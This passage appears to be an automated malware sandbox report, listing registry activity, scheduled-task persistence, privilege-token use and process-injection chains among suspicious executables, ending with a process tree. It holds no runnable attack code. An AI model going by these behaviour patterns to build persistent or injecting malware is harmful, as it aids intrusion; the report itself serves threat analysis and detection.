\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A explorer.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 6744 timeout.exe 11220 timeout.exe -
GoLang User-Agent 1 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
description flow ioc HTTP User-Agent header 344 Go-http-client/1.1 -
Modifies registry class 57 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\PersistedTitleBarData\Microsoft.MicrosoftStickyNotes_8wekyb3d8 = "1" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\PersistedTitleBarData\Microsoft.MicrosoftStickyNotes_8wekyb3d8 = "1" explorer.exe Key created \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots explorer.exe Key created \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell explorer.exe Key created \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\WasEverActivated = "1" sihost.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\ApplicationFrame\Microsoft.Windows.PeopleExperienceHos = 6801000088020000 explorer.exe Key created \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\ApplicationFrame\Microsoft.Windows.PeopleExperienceHos = 6801000088020000 explorer.exe Key created \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ explorer.exe Key created \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000_Classes\Local Settings\MuiCache StartMenuExperienceHost.exe Set value (data) \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots explorer.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1062200478-553497403-3857448183-1000\{35D5FF42-B47B-4964-9FBF-C34823EA0706} explorer.exe Key created \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\PersistedTitleBarData\Microsoft.MicrosoftStickyNotes_8wekyb3d8 explorer.exe Key created \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU explorer.exe Key created \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\PersistedTitleBarData explorer.exe Key created \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000_Classes\Local Settings explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\PersistedTitleBarData\Microsoft.MicrosoftStickyNotes_8wekyb3d8 = "1" explorer.exe Key created \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000_Classes\Local Settings\MuiCache StartMenuExperienceHost.exe Key created \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000_Classes\Local Settings explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\PersistedTitleBarData\Microsoft.MicrosoftStickyNotes_8wekyb3d8 = "1" explorer.exe Key created \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU explorer.exe Key created \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\PersistedTitleBarData explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ explorer.exe Key created \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\PersistedTitleBarData explorer.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1062200478-553497403-3857448183-1000\{28F9D0AA-4525-4D01-93E9-C062ABC3ABF8} explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ explorer.exe Key created \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\PersistedTitleBarData\Microsoft.MicrosoftStickyNotes_8wekyb3d8 explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\WasEverActivated = "1" sihost.exe Set value (data) \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff explorer.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1062200478-553497403-3857448183-1000\{0B05371C-578A-4B1D-8382-9BC6C8B9A25C} explorer.exe Key created \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ explorer.exe Key created \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\PersistedTitleBarData\Microsoft.MicrosoftStickyNotes_8wekyb3d8 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ explorer.exe Key created \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000_Classes\Local Settings\MuiCache StartMenuExperienceHost.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1062200478-553497403-3857448183-1000\{E5BC4B1A-2853-4034-9D62-1E4CBE8FA76F} explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff explorer.exe Key created \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell explorer.exe Key created \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU explorer.exe Key created \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots explorer.exe Key created \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots explorer.exe Key created \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\PersistedTitleBarData\Microsoft.MicrosoftStickyNotes_8wekyb3d8 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\ApplicationFrame\Microsoft.Windows.PeopleExperienceHos = 6801000088020000 explorer.exe Key created \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff explorer.exe Key created \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\PersistedTitleBarData explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\ApplicationFrame\Microsoft.Windows.PeopleExperienceHos = 6801000088020000 explorer.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 6428 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4640 SCHTASKS.exe 6560 schtasks.exe 6388 schtasks.exe 6084 schtasks.exe 10780 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 49 IoCs
pid Process 1676 1u87m9.exe 1676 1u87m9.exe 4476 rapes.exe 4476 rapes.exe 4608 2x8387.exe 4608 2x8387.exe 4256 3790e4346a.exe 4256 3790e4346a.exe 4256 3790e4346a.exe 4256 3790e4346a.exe 4256 3790e4346a.exe 4256 3790e4346a.exe 4256 3790e4346a.exe 4256 3790e4346a.exe 3144 JqGBbm7.exe 3144 JqGBbm7.exe 5832 powershell.exe 5832 powershell.exe 3920 v6Oqdnc.exe 3920 v6Oqdnc.exe 1364 Bthvgkck.exe 1364 Bthvgkck.exe 3920 v6Oqdnc.exe 3920 v6Oqdnc.exe 3920 v6Oqdnc.exe 3920 v6Oqdnc.exe 1364 Bthvgkck.exe 2924 rapes.exe 2924 rapes.exe 3920 v6Oqdnc.exe 3920 v6Oqdnc.exe 3920 v6Oqdnc.exe 3920 v6Oqdnc.exe 2288 HmngBpR.exe 2288 HmngBpR.exe 5068 SplashWin.exe 1080 SplashWin.exe 1080 SplashWin.exe 1080 SplashWin.exe 5848 powershell.exe 5848 powershell.exe 5968 cmd.exe 5968 cmd.exe 1680 RegAsm.exe 1680 RegAsm.exe 4104 cronikxqqq.exe 4104 cronikxqqq.exe 4104 cronikxqqq.exe 4104 cronikxqqq.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 1080 SplashWin.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeImpersonatePrivilege 4256 3790e4346a.exe Token: SeImpersonatePrivilege 4256 3790e4346a.exe Token: SeDebugPrivilege 5832 powershell.exe Token: SeImpersonatePrivilege 3920 v6Oqdnc.exe Token: SeImpersonatePrivilege 3920 v6Oqdnc.exe Token: SeDebugPrivilege 5848 powershell.exe Token: SeDebugPrivilege 1680 RegAsm.exe Token: SeShutdownPrivilege 3600 explorer.exe Token: SeCreatePagefilePrivilege 3600 explorer.exe Token: SeShutdownPrivilege 3600 explorer.exe Token: SeCreatePagefilePrivilege 3600 explorer.exe Token: SeShutdownPrivilege 3600 explorer.exe Token: SeCreatePagefilePrivilege 3600 explorer.exe Token: SeShutdownPrivilege 3600 explorer.exe Token: SeCreatePagefilePrivilege 3600 explorer.exe Token: SeShutdownPrivilege 3600 explorer.exe Token: SeCreatePagefilePrivilege 3600 explorer.exe Token: SeShutdownPrivilege 3600 explorer.exe Token: SeCreatePagefilePrivilege 3600 explorer.exe Token: SeShutdownPrivilege 3600 explorer.exe Token: SeCreatePagefilePrivilege 3600 explorer.exe Token: SeShutdownPrivilege 3600 explorer.exe Token: SeCreatePagefilePrivilege 3600 explorer.exe Token: SeShutdownPrivilege 3600 explorer.exe Token: SeCreatePagefilePrivilege 3600 explorer.exe Token: SeShutdownPrivilege 3600 explorer.exe Token: SeCreatePagefilePrivilege 3600 explorer.exe Token: SeShutdownPrivilege 3600 explorer.exe Token: SeCreatePagefilePrivilege 3600 explorer.exe Token: SeShutdownPrivilege 4316 explorer.exe Token: SeCreatePagefilePrivilege 4316 explorer.exe Token: SeShutdownPrivilege 4316 explorer.exe Token: SeCreatePagefilePrivilege 4316 explorer.exe Token: SeShutdownPrivilege 4316 explorer.exe Token: SeCreatePagefilePrivilege 4316 explorer.exe Token: SeShutdownPrivilege 4316 explorer.exe Token: SeCreatePagefilePrivilege 4316 explorer.exe Token: SeShutdownPrivilege 4316 explorer.exe Token: SeCreatePagefilePrivilege 4316 explorer.exe Token: SeShutdownPrivilege 4316 explorer.exe Token: SeCreatePagefilePrivilege 4316 explorer.exe Token: SeShutdownPrivilege 4316 explorer.exe Token: SeCreatePagefilePrivilege 4316 explorer.exe Token: SeShutdownPrivilege 4316 explorer.exe Token: SeCreatePagefilePrivilege 4316 explorer.exe Token: SeShutdownPrivilege 4316 explorer.exe Token: SeCreatePagefilePrivilege 4316 explorer.exe Token: SeShutdownPrivilege 4316 explorer.exe Token: SeCreatePagefilePrivilege 4316 explorer.exe Token: SeShutdownPrivilege 4316 explorer.exe Token: SeCreatePagefilePrivilege 4316 explorer.exe Token: SeShutdownPrivilege 4316 explorer.exe Token: SeCreatePagefilePrivilege 4316 explorer.exe Token: SeShutdownPrivilege 4688 explorer.exe Token: SeCreatePagefilePrivilege 4688 explorer.exe Token: SeShutdownPrivilege 4688 explorer.exe Token: SeCreatePagefilePrivilege 4688 explorer.exe Token: SeShutdownPrivilege 4688 explorer.exe Token: SeCreatePagefilePrivilege 4688 explorer.exe Token: SeShutdownPrivilege 4688 explorer.exe Token: SeCreatePagefilePrivilege 4688 explorer.exe Token: SeShutdownPrivilege 4688 explorer.exe Token: SeCreatePagefilePrivilege 4688 explorer.exe Token: SeShutdownPrivilege 4688 explorer.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 1676 1u87m9.exe 6120 sihost.exe 3600 explorer.exe 3600 explorer.exe 3600 explorer.exe 3600 explorer.exe 3600 explorer.exe 3600 explorer.exe 3600 explorer.exe 3600 explorer.exe 3600 explorer.exe 3600 explorer.exe 3600 explorer.exe 3600 explorer.exe 3600 explorer.exe 3600 explorer.exe 3600 explorer.exe 3600 explorer.exe 4316 explorer.exe 4316 explorer.exe 4316 explorer.exe 4316 explorer.exe 4316 explorer.exe 4316 explorer.exe 4316 explorer.exe 4316 explorer.exe 4316 explorer.exe 4316 explorer.exe 4316 explorer.exe 4316 explorer.exe 4316 explorer.exe 4316 explorer.exe 4316 explorer.exe 4316 explorer.exe 4316 explorer.exe 4316 explorer.exe 4316 explorer.exe 4316 explorer.exe 4316 explorer.exe 4316 explorer.exe 4316 explorer.exe 4316 explorer.exe 4688 explorer.exe 4688 explorer.exe 4688 explorer.exe 4688 explorer.exe 4688 explorer.exe 4688 explorer.exe 4688 explorer.exe 4688 explorer.exe 4688 explorer.exe 4688 explorer.exe 4688 explorer.exe 4688 explorer.exe 4688 explorer.exe 4688 explorer.exe 4688 explorer.exe 4688 explorer.exe 4688 explorer.exe 2368 explorer.exe 2368 explorer.exe 2368 explorer.exe 2368 explorer.exe 2368 explorer.exe -
Suspicious use of SendNotifyMessage 46 IoCs
pid Process 3600 explorer.exe 3600 explorer.exe 3600 explorer.exe 3600 explorer.exe 3600 explorer.exe 3600 explorer.exe 3600 explorer.exe 3600 explorer.exe 3600 explorer.exe 3600 explorer.exe 3600 explorer.exe 4316 explorer.exe 4316 explorer.exe 4316 explorer.exe 4316 explorer.exe 4316 explorer.exe 4316 explorer.exe 4316 explorer.exe 4316 explorer.exe 4316 explorer.exe 4316 explorer.exe 4316 explorer.exe 4316 explorer.exe 4316 explorer.exe 4688 explorer.exe 4688 explorer.exe 4688 explorer.exe 4688 explorer.exe 4688 explorer.exe 4688 explorer.exe 4688 explorer.exe 4688 explorer.exe 4688 explorer.exe 4688 explorer.exe 4688 explorer.exe 2368 explorer.exe 2368 explorer.exe 2368 explorer.exe 2368 explorer.exe 2368 explorer.exe 2368 explorer.exe 2368 explorer.exe 2368 explorer.exe 2368 explorer.exe 2368 explorer.exe 2368 explorer.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
pid Process 2288 HmngBpR.exe 3276 StartMenuExperienceHost.exe 4040 StartMenuExperienceHost.exe 5984 StartMenuExperienceHost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1744 wrote to memory of 1676 1744 u0k28.exe 89 PID 1744 wrote to memory of 1676 1744 u0k28.exe 89 PID 1744 wrote to memory of 1676 1744 u0k28.exe 89 PID 1676 wrote to memory of 4476 1676 1u87m9.exe 90 PID 1676 wrote to memory of 4476 1676 1u87m9.exe 90 PID 1676 wrote to memory of 4476 1676 1u87m9.exe 90 PID 1744 wrote to memory of 4608 1744 u0k28.exe 91 PID 1744 wrote to memory of 4608 1744 u0k28.exe 91 PID 1744 wrote to memory of 4608 1744 u0k28.exe 91 PID 4476 wrote to memory of 5192 4476 rapes.exe 93 PID 4476 wrote to memory of 5192 4476 rapes.exe 93 PID 4476 wrote to memory of 5192 4476 rapes.exe 93 PID 5192 wrote to memory of 4256 5192 3790e4346a.exe 94 PID 5192 wrote to memory of 4256 5192 3790e4346a.exe 94 PID 5192 wrote to memory of 4256 5192 3790e4346a.exe 94 PID 5192 wrote to memory of 4256 5192 3790e4346a.exe 94 PID 5192 wrote to memory of 4256 5192 3790e4346a.exe 94 PID 5192 wrote to memory of 4256 5192 3790e4346a.exe 94 PID 5192 wrote to memory of 4256 5192 3790e4346a.exe 94 PID 5192 wrote to memory of 4256 5192 3790e4346a.exe 94 PID 5192 wrote to memory of 4256 5192 3790e4346a.exe 94 PID 4476 wrote to memory of 3144 4476 rapes.exe 96 PID 4476 wrote to memory of 3144 4476 rapes.exe 96 PID 4476 wrote to memory of 3144 4476 rapes.exe 96 PID 4476 wrote to memory of 2240 4476 rapes.exe 97 PID 4476 wrote to memory of 2240 4476 rapes.exe 97 PID 4476 wrote to memory of 2240 4476 rapes.exe 97 PID 2240 wrote to memory of 3176 2240 zY9sqWs.exe 98 PID 2240 wrote to memory of 3176 2240 zY9sqWs.exe 98 PID 2240 wrote to memory of 3176 2240 zY9sqWs.exe 98 PID 3176 wrote to memory of 5832 3176 Gxtuum.exe 99 PID 3176 wrote to memory of 5832 3176 Gxtuum.exe 99 PID 4476 wrote to memory of 3920 4476 rapes.exe 101 PID 4476 wrote to memory of 3920 4476 rapes.exe 101 PID 4476 wrote to memory of 3920 4476 rapes.exe 101 PID 3176 wrote to memory of 1364 3176 Gxtuum.exe 102 PID 3176 wrote to memory of 1364 3176 Gxtuum.exe 102 PID 1364 wrote to memory of 2548 1364 Bthvgkck.exe 42 PID 4476 wrote to memory of 2288 4476 rapes.exe 109 PID 4476 wrote to memory of 2288 4476 rapes.exe 109 PID 2288 wrote to memory of 5068 2288 HmngBpR.exe 110 PID 2288 wrote to memory of 5068 2288 HmngBpR.exe 110 PID 2288 wrote to memory of 5068 2288 HmngBpR.exe 110 PID 5068 wrote to memory of 1080 5068 SplashWin.exe 111 PID 5068 wrote to memory of 1080 5068 SplashWin.exe 111 PID 5068 wrote to memory of 1080 5068 SplashWin.exe 111 PID 1080 wrote to memory of 5968 1080 SplashWin.exe 112 PID 1080 wrote to memory of 5968 1080 SplashWin.exe 112 PID 1080 wrote to memory of 5968 1080 SplashWin.exe 112 PID 4476 wrote to memory of 1744 4476 rapes.exe 114 PID 4476 wrote to memory of 1744 4476 rapes.exe 114 PID 1744 wrote to memory of 5848 1744 ADFoyxP.exe 115 PID 1744 wrote to memory of 5848 1744 ADFoyxP.exe 115 PID 1080 wrote to memory of 5968 1080 SplashWin.exe 112 PID 4476 wrote to memory of 2476 4476 rapes.exe 117 PID 4476 wrote to memory of 2476 4476 rapes.exe 117 PID 4476 wrote to memory of 2476 4476 rapes.exe 117 PID 2476 wrote to memory of 424 2476 amnew.exe 118 PID 2476 wrote to memory of 424 2476 amnew.exe 118 PID 2476 wrote to memory of 424 2476 amnew.exe 118 PID 2548 wrote to memory of 1680 2548 sihost.exe 120 PID 2548 wrote to memory of 1680 2548 sihost.exe 120 PID 2548 wrote to memory of 1680 2548 sihost.exe 120 PID 2548 wrote to memory of 1680 2548 sihost.exe 120
Processes
-
C:\Windows\system32\sihost.exesihost.exe1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2548 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵
- System Location Discovery: System Language Discovery
